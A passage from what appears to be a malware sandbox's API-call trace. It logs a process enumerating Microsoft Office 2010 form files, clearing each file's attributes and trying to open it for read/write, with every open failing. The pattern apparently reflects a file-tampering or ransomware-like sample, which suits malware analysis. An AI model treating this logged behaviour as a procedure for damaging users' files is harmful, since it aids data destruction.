dwFileAttributes=0x80) returned 0 [0136.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.744] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG", dwFileAttributes=0x80) returned 0 [0136.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.745] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO", dwFileAttributes=0x80) returned 0 [0136.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.745] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO", dwFileAttributes=0x80) returned 0 [0136.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.746] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.746] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.746] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG", dwFileAttributes=0x80) returned 0 [0136.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.747] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.747] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.747] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.747] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO", dwFileAttributes=0x80) returned 0 [0136.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.747] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.747] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.748] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.748] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO", dwFileAttributes=0x80) returned 0 [0136.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.748] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.748] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.748] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG", dwFileAttributes=0x80) returned 0 [0136.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.749] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.749] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.749] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO", dwFileAttributes=0x80) returned 0 [0136.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.750] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO", dwFileAttributes=0x80) returned 0 [0136.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.750] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO", dwFileAttributes=0x80) returned 0 [0136.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.751] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO", dwFileAttributes=0x80) returned 0 [0136.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.752] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.752] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.752] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO", dwFileAttributes=0x80) returned 0 [0136.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.752] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.753] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.753] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO", dwFileAttributes=0x80) returned 0 [0136.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.753] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.753] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.753] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.753] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO", dwFileAttributes=0x80) returned 0 [0136.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.754] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.754] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.754] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO", dwFileAttributes=0x80) returned 0 [0136.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.755] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO", dwFileAttributes=0x80) returned 0 [0136.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.755] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO", dwFileAttributes=0x80) returned 0 [0136.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO", dwFileAttributes=0x80) returned 0 [0136.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.757] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.757] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO", dwFileAttributes=0x80) returned 0 [0136.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.758] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.758] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG", dwFileAttributes=0x80) returned 0 [0136.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.759] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG", dwFileAttributes=0x80) returned 0 [0136.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.759] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG", dwFileAttributes=0x80) returned 0 [0136.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.760] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG", dwFileAttributes=0x80) returned 0 [0136.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.761] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.761] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG", dwFileAttributes=0x80) returned 0 [0136.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.762] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG", dwFileAttributes=0x80) returned 0 [0136.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.763] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO", dwFileAttributes=0x80) returned 0 [0136.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.763] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO", dwFileAttributes=0x80) returned 0 [0136.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.764] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG", dwFileAttributes=0x80) returned 0 [0136.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.764] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO", dwFileAttributes=0x80) returned 0 [0136.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 